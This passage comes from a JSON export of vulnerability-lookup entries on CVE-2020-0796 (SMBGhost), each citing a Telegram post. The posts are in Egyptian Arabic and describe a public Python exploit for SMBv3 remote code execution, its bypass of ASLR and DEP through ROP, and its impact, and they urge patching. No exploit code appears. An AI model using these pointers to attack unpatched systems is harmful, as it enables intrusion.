\u062c\u062f\u0627\n\n\u0644\u0630\u0644\u0643 \u0644\u0648 \u0623\u064a \u0647\u0627\u0643\u0631 \u0639\u0627\u064a\u0632 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0644\u0627\u0632\u0645 \u064a\u0643\u0648\u0646 \u0639\u0646\u062f\u0647 \u0641\u0647\u0645 \u0639\u0645\u064a\u0642 \u062c\u062f\u0627 \u0639\u0646 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0648\u0639\u0646 \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0648\u0643\u0645\u0627\u0646 \u064a\u0643\u0648\u0646 \u0639\u0646\u062f\u0647 \u0627\u0644\u0645\u0647\u0627\u0631\u0627\u062a \u0627\u0644\u0643\u0627\u0641\u064a\u0629 \u0644\u062a\u062e\u0637\u064a \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u0627\u0644\u0644\u064a \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u062d\u0637\u062a\u0647\u0627 \u0641\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0627\u0644\u0644\u064a \u0628\u0646\u0635\u062d \u0628\u064a\u0647 \u0623\u064a \u062d\u062f \u0628\u064a\u0634\u062a\u063a\u0644 \u0641\u064a \u0627\u0644\u0645\u062c\u0627\u0644 \u062f\u0647 \u0625\u0646\u0647 \u062f\u0627\u064a\u0645\u0627 \u064a\u0637\u0644\u0639 \u0639\u0644\u0649 \u0643\u0644 \u062c\u062f\u064a\u062f \u0648\u064a\u062d\u0627\u0648\u0644 \u064a\u0641\u0647\u0645 \u062a\u0641\u0627\u0635\u064a\u0644 \u0623\u0643\u062a\u0631 \u0639\u0646 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644\u0627\u062a \u0648\u0627\u0644\u0646\u0638\u0645 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0639\u0644\u064a\u0647\u0627 \u0639\u0634\u0627\u0646 \u064a\u0642\u062f\u0631 \u064a\u0643\u062a\u0628 Exploits \u0646\u0627\u062c\u062d\u0629 \u0648\u0645\u0624\u062b\u0631\u0629\n\n\u0631\u0627\u0628\u0637 \u0627\u0644\u0640EXPLOIT", "creation_timestamp": "2024-08-14T17:15:27.000000Z"}, {"uuid": "9e5dc591-b80d-4629-88ae-823c9d9a04c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/malwaremanzero/73", "content": "\u0628\u0623\u062e\u062a\u0635\u0627\u0631 \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0627\u0644\u0644\u064a \u0639\u0644\u0649 GitHub \u0647\u064a \u0623\u062f\u0627\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 (Exploit) \u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0628\u0640CVE-2020-0796 \u0648\u0627\u0644\u0644\u064a \u0647\u064a \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0627\u0644\u0644\u064a \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u0641\u064a \u0645\u0634\u0627\u0631\u0643\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0639\u0644\u0649 \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u0623\u0643\u0648\u0627\u062f \u062e\u0628\u064a\u062b\u0629 \u0639\u0646 \u0628\u0639\u062f (Remote Code Execution) \u0639\u0644\u0649 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\u060c \u0628\u0645\u0639\u0646\u0649 \u0625\u0646\u0647 \u064a\u0642\u062f\u0631 \u064a\u0634\u063a\u0644 \u0623\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u0623\u0648 \u0633\u0643\u0631\u064a\u0628\u062a \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0636\u062d\u064a\u0629 \u0645\u0646 \u063a\u064a\u0631 \u0645\u0627 \u064a\u0643\u0648\u0646 \u0644\u064a\u0647 \u0623\u064a \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0648 \u0625\u0630\u0646 \u0645\u0633\u0628\u0642\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0645\u0643\u062a\u0648\u0628\u0629 \u0628\u0644\u063a\u0629 \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0628\u0627\u064a\u062b\u0648\u0646 \u0648\u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0645\u0643\u062a\u0628\u0627\u062a \u0632\u064a scapy \u0639\u0634\u0627\u0646 \u062a\u0648\u0644\u062f \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0628\u0627\u0643\u062a\u0633 (Packets) \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0639\u0644\u0649 \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u0644\u064a \u062d\u0635\u0644 \u0625\u0646\u0647 \u0641\u064a \u0645\u0627\u0631\u0633 2020\u060c \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u0623\u0639\u0644\u0646\u062a \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0648\u0646\u0634\u0631\u062a \u062a\u062d\u062f\u064a\u062b \u0623\u0645\u0646\u064a \u0644\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c \u0628\u0633 \u0643\u062a\u064a\u0631 \u0645\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u062d\u0648\u0644 \u0627\u0644\u0639\u0627\u0644\u0645 \u0645\u0627 \u0637\u0628\u0642\u062a\u0634 \u0627\u0644\u062a\u062d\u062f\u064a\u062b \u062f\u0627 \u0641\u0648\u0631\u0627\u064b\u060c \u0641\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0643\u0627\u0646\u062a \u0645\u0639\u0631\u0636\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0644\u064a \u0643\u062a\u0628 \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0643\u0627\u0646 \u0647\u062f\u0641\u0647 \u064a\u0633\u062a\u0641\u064a\u062f \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u062b\u0628\u062a \u062a\u062d\u0643\u0645\u0647 \u0627\u0644\u0643\u0627\u0645\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0645\u0627 \u0637\u0628\u0642\u062a\u0634 \u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0645\u0646\u064a\u060c \u0643\u062a\u0627\u0628\u0629 exploit \u0644\u062b\u063a\u0631\u0629 \u0632\u064a \u062f\u064a \u0628\u062a\u062d\u062a\u0627\u062c \u0645\u0639\u0631\u0641\u0629 \u062a\u0642\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u062c\u062f\u0627\u064b\u060c \u0645\u0634 \u0628\u0633 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629\u060c \u0644\u0643\u0646 \u0643\u0645\u0627\u0646 \u0641\u064a \u0641\u0647\u0645 \u0639\u0645\u064a\u0642 \u0644\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644\u0627\u062a \u0627\u0644\u0634\u0628\u0643\u064a\u0629 \u0648\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062a\u0642\u0646\u064a\u0629 \u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644\u060c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u064a\u062d\u062a\u0627\u062c \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0625\u0646\u0647 \u064a\u0639\u0645\u0644 \u062a\u062d\u0644\u064a\u0644 \u0644\u0644\u062b\u063a\u0631\u0629 (Reverse Engineering) \u0639\u0634\u0627\u0646 \u064a\u0639\u0631\u0641 \u0625\u064a\u0647 \u0627\u0644\u062e\u0644\u0644 \u0627\u0644\u0644\u064a \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u0628\u062a\u062f\u064a \u064a\u0643\u062a\u0628 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0644\u064a \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062e\u0644\u0644 \u062f\u0627\u060c \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062a\u062d\u062f\u064a\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u0648\u0627\u062c\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0647\u064a \u0625\u0646\u0647 \u064a\u0644\u0627\u0642\u064a \u0637\u0631\u064a\u0642\u0629 \u0639\u0634\u0627\u0646 \u064a\u0639\u062f\u064a \u0645\u0646 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u064a\u0641\u0639\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b \u0628\u062f\u0648\u0646 \u0645\u0627 \u064a\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u060c \u0648\u062f\u0627 \u0628\u064a\u062d\u062a\u0627\u062c \u0645\u0646\u0647 \u062a\u062c\u0631\u0628\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u0633\u062a\u0645\u0631 \u0644\u062d\u062f \u0645\u0627 \u064a\u0648\u0635\u0644 \u0644\u0643\u0648\u062f \u064a\u0643\u0648\u0646 \u0641\u0639\u0627\u0644 \u0628\u0646\u0633\u0628\u0629 \u0643\u0628\u064a\u0631\u0629\u060c \u062e\u0637\u0648\u0631\u0629 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u064a\u062c\u064a \u0645\u0646 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0636\u062d\u064a\u0629 \u0628\u062f\u0648\u0646 \u0623\u064a \u062a\u0641\u0627\u0639\u0644 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u060c \u064a\u0639\u0646\u064a \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0645\u0643\u0646 \u064a\u0639\u0645\u0644 \u0623\u064a \u062d\u0627\u062c\u0629 \u0628\u062f\u0627\u064a\u0629 \u0645\u0646 \u0633\u0631\u0642\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0644\u062d\u062f \u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0644\u0643\u0627\u0645\u0644\u060c \u062f\u0627 \u063a\u064a\u0631 \u0625\u0646\u0647 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0635\u0627\u0628\u0629 \u0643\u0645\u0646\u0635\u0627\u062a \u0644\u0634\u0646 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0639\u0644\u0649 \u0623\u0647\u062f\u0627\u0641 \u062a\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0628\u0627\u0644\u0631\u063a\u0645 \u0645\u0646 \u062e\u0637\u0648\u0631\u062a\u0647\u0627 \u0625\u0644\u0627 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0627\u0639\u062f \u0641\u0631\u0642 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0639\u0644\u0649 \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u062a\u062d\u062f\u064a\u062f \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0645\u062d\u062a\u0627\u062c\u0629 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0623\u0645\u0646\u064a\u0629\u060c \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u0644\u0648 \u0628\u062a\u062f\u064a\u0631 \u0634\u0628\u0643\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062c\u0647\u0627\u0632 \u0634\u062e\u0635\u064a\u060c \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646\u0643 \u062f\u0627\u064a\u0645\u0627\u064b \u0628\u062a\u062d\u062f\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u062a\u062b\u0628\u062a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u0648\u0631 \u0646\u0632\u0648\u0644\u0647\u0627 \u0639\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0632\u064a \u062f\u064a\u060c \u062e\u0644\u0627\u0635\u0629 \u0627\u0644\u0643\u0644\u0627\u0645\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0645\u062b\u0627\u0644 \u062d\u064a \u0639\u0644\u0649 \u0623\u0647\u0645\u064a\u0629 \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0639\u0644\u0649 \u0642\u062f \u0625\u064a\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0645\u0645\u0643\u0646 \u064a\u0643\u0648\u0646\u0648\u0627 \u0645\u0628\u062f\u0639\u064a\u0646 \u0641\u064a \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0644\u062a\u062d\u0642\u064a\u0642 \u0623\u0647\u062f\u0627\u0641\u0647\u0645\u060c \u0648\u0623\u064a\u0636\u0627\u064b \u062a\u0630\u0643\u064a\u0631 \u0628\u0636\u0631\u0648\u0631\u0629 \u0627\u0644\u0628\u0642\u0627\u0621 \u0639\u0644\u0649 \u0627\u0637\u0644\u0627\u0639 \u062f\u0627\u064a\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0623\u0641\u0636\u0644 \u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0627\u062a \u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629.", "creation_timestamp": "2024-07-12T07:53:17.000000Z"}, {"uuid": "03892321-05f3-4974-b85f-321ccf16743f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/malwaremanzero/72", "content": "\u0627\u0644\u0645\u0648\u0636\u0648\u0639 \u0628\u064a\u062a\u0643\u0644\u0645 \u0639\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0623\u0645\u0646\u064a \u0645\u0647\u0645 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0627\u0644\u062e\u0627\u0635 \u0628\u0623\u0646\u0638\u0645\u0629 \u0648\u064a\u0646\u062f\u0648\u0632 CVE-2020-0796 \u0623\u0648 \u0632\u064a \u0645\u0627 \u0628\u064a\u0637\u0644\u0642\u0648\u0627 \u0639\u0644\u064a\u0647 \u0623\u062d\u064a\u0627\u0646\u064b\u0627 \u0627\u0633\u0645 \"SMBGhost\" \u0647\u0648 \u062b\u063a\u0631\u0629 \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0634\u063a\u0644 \u0623\u0643\u0648\u0627\u062f \u0636\u0627\u0631\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u0644\u0623\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0623\u064a \u0647\u0627\u0643\u0631 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0635\u0627\u0628\u0629 \u0648\u0643\u0623\u0646\u0647\u0645 \u062c\u0648\u0627 \u0627\u0644\u062c\u0647\u0627\u0632 \u0628\u064a\u0642\u062f\u0631\u0648\u0627 \u064a\u062b\u0628\u062a\u0648\u0627 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u064a\u0633\u0631\u0642\u0648\u0627 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u064a\u062d\u0648\u0644\u0648\u0627 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0644\u0634\u0628\u0643\u0629 Botnet \u0627\u0644\u0644\u064a \u0647\u064a \u0634\u0628\u0643\u0629 \u0645\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0628\u064a\u062a\u0645 \u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a\u0647\u0627 \u0639\u0646 \u0628\u0639\u062f \u0644\u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631\n\n\u0627\u0644\u0640Exploit \u062f\u0647 \u062a\u0645 \u0643\u062a\u0627\u0628\u062a\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0642\u0646\u064a\u0627\u062a \u0645\u0639\u0642\u062f\u0629 \u0648\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0627\u0644\u0644\u064a \u0627\u0634\u062a\u063a\u0644\u0648\u0627 \u0639\u0644\u064a\u0647 \u0648\u0627\u062c\u0647\u0648\u0627 \u062a\u062d\u062f\u064a\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u0646\u0639\u0631\u0641\u0647\u0627 \u0625\u0646 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0647\u0648 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0634\u0628\u0643\u064a \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u0646\u0642\u0644 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0641\u064a \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0643\u0644 \u0646\u0633\u062e \u0648\u064a\u0646\u062f\u0648\u0632 \u0627\u0644\u062d\u062f\u064a\u062b\u0629 \u0627\u0644\u0644\u064a \u062d\u0635\u0644 \u0647\u0648 \u0625\u0646\u0647\u0645 \u0627\u0643\u062a\u0634\u0641\u0648\u0627 \u0625\u0646 \u0641\u064a\u0647 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0637\u0631\u064a\u0642\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0644\u0628\u0639\u0636 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0628\u0639\u062a \u0639\u0628\u0631 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062f\u064a \u0628\u062a\u062e\u0644\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u064a\u0642\u0628\u0644 \u0623\u0643\u0648\u0627\u062f \u0636\u0627\u0631\u0629 \u0648\u0628\u064a\u0634\u063a\u0644\u0647\u0627 \u0643\u0623\u0646\u0647\u0627 \u062c\u0632\u0621 \u0645\u0646 \u0627\u0644\u0646\u0638\u0627\u0645 \u0646\u0641\u0633\u0647\n\n\u0639\u0645\u0644\u064a\u0629 \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0640Exploit \u0643\u0627\u0646\u062a \u0645\u0639\u0642\u062f\u0629 \u062c\u062f\u064b\u0627 \u0644\u0623\u0646 \u0627\u0644\u0640SMB3 \u0647\u0648 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0645\u0639\u0642\u062f \u0648\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0643\u0627\u0646\u0648\u0627 \u0645\u062d\u062a\u0627\u062c\u064a\u0646 \u064a\u0641\u0647\u0645\u0648\u0627 \u0643\u0648\u064a\u0633 \u062c\u062f\u064b\u0627 \u0625\u0632\u0627\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0628\u064a\u0634\u062a\u063a\u0644 \u0648\u0627\u064a\u0647 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u063a\u0644\u0648\u0647\u0627 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0643\u0627\u0646\u062a \u0641\u064a\u0647 \u0635\u0639\u0648\u0628\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u0632\u064a \u0645\u062b\u0644\u0627 \u0625\u0646\u0647 \u0643\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0641\u0647\u0645\u0648\u0627 \u062a\u0641\u0627\u0635\u064a\u0644 \u0639\u0645\u064a\u0642\u0629 \u062c\u062f\u064b\u0627 \u0639\u0646 \u0628\u0646\u064a\u0629 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0646\u0641\u0633\u0647 \u0648\u0639\u0646 \u0637\u0631\u064a\u0642\u0629 \u0639\u0645\u0644 \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0648\u0643\u0645\u0627\u0646 \u0639\u0646 \u0637\u0631\u0642 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0644\u064a \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u0628\u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0639\u0634\u0627\u0646 \u062a\u0645\u0646\u0639 \u0627\u0644\u062d\u0627\u062c\u0627\u062a \u062f\u064a\n\n\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u062f\u0648\u0644 \u0643\u0627\u0646\u0648\u0627 \u0645\u062d\u062a\u0627\u062c\u064a\u0646 \u064a\u062a\u062e\u0637\u0648\u0627 \u0643\u0644 \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u0642\u062f\u0631\u0648\u0627 \u064a\u0634\u063a\u0644\u0648\u0627 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629 \u0639\u0646 \u0628\u0639\u062f \u062f\u064a \u0639\u0645\u0644\u064a\u0629 \u0645\u0634 \u0633\u0647\u0644\u0629 \u0625\u0637\u0644\u0627\u0642\u064b\u0627 \u0644\u0623\u0646 \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u062a\u0642\u0646\u064a\u0627\u062a \u0632\u064a \u0627\u0644\u0640ASLR \u0648\u0627\u0644\u0640DEP \u0627\u0644\u0644\u064a \u0647\u0645\u0627 \u0628\u064a\u063a\u064a\u0631\u0648\u0627 \u0623\u0645\u0627\u0643\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0648\u0628\u064a\u0645\u0646\u0639\u0648\u0627 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629 \u0628\u0633\u0647\u0648\u0644\u0629 \u0639\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0643\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0644\u0627\u0642\u0648\u0627 \u0637\u0631\u064a\u0642\u0629 \u0644\u062a\u062d\u062f\u064a\u062f \u0645\u0643\u0627\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u062f\u064a \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062f\u0642\u064a\u0642\u0629 \u062c\u062f\u064b\u0627 \u0648\u0639\u0634\u0627\u0646 \u064a\u062a\u063a\u0644\u0628\u0648\u0627 \u0639\u0644\u0649 \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u062f\u064a \u0627\u0633\u062a\u062e\u062f\u0645\u0648\u0627 \u062d\u0627\u062c\u0627\u062a \u0632\u064a \u0627\u0644\u0640ROP \u0627\u0644\u0644\u064a \u0647\u064a \u062a\u0642\u0646\u064a\u0629 \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0642\u0637\u0639 \u0635\u063a\u064a\u0631\u0629 \u0645\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0645\u0648\u062c\u0648\u062f\u0629 \u0623\u0635\u0644\u0627 \u0641\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u0639\u0634\u0627\u0646 \u062a\u0634\u063a\u0644 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629\n\n\u0637\u0628\u0639\u0627 \u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u062f\u064a \u0643\u0627\u0646\u062a \u0628\u062a\u0627\u062e\u062f \u0648\u0642\u062a \u0637\u0648\u064a\u0644 \u062c\u062f\u0627 \u0648\u0643\u0627\u0646\u0648\u0627 \u0628\u064a\u0648\u0627\u062c\u0647\u0648\u0627 \u0645\u0634\u0627\u0643\u0644 \u0643\u062a\u064a\u0631 \u0641\u064a \u0643\u0644 \u062e\u0637\u0648\u0629 \u0644\u0623\u0646\u0647 \u0632\u064a \u0645\u0627 \u0642\u0648\u0644\u0646\u0627 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0645\u0639\u0642\u062f \u0648\u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u0643\u062a\u064a\u0631\u0629 \u0628\u0633 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0642\u062f\u0631\u0648\u0627 \u064a\u0643\u062a\u0628\u0648\u0627 \u0627\u0644\u0640Exploit \u0648\u064a\u062b\u0628\u062a\u0648\u0627 \u0625\u0646\u0647 \u0628\u064a\u0634\u062a\u063a\u0644 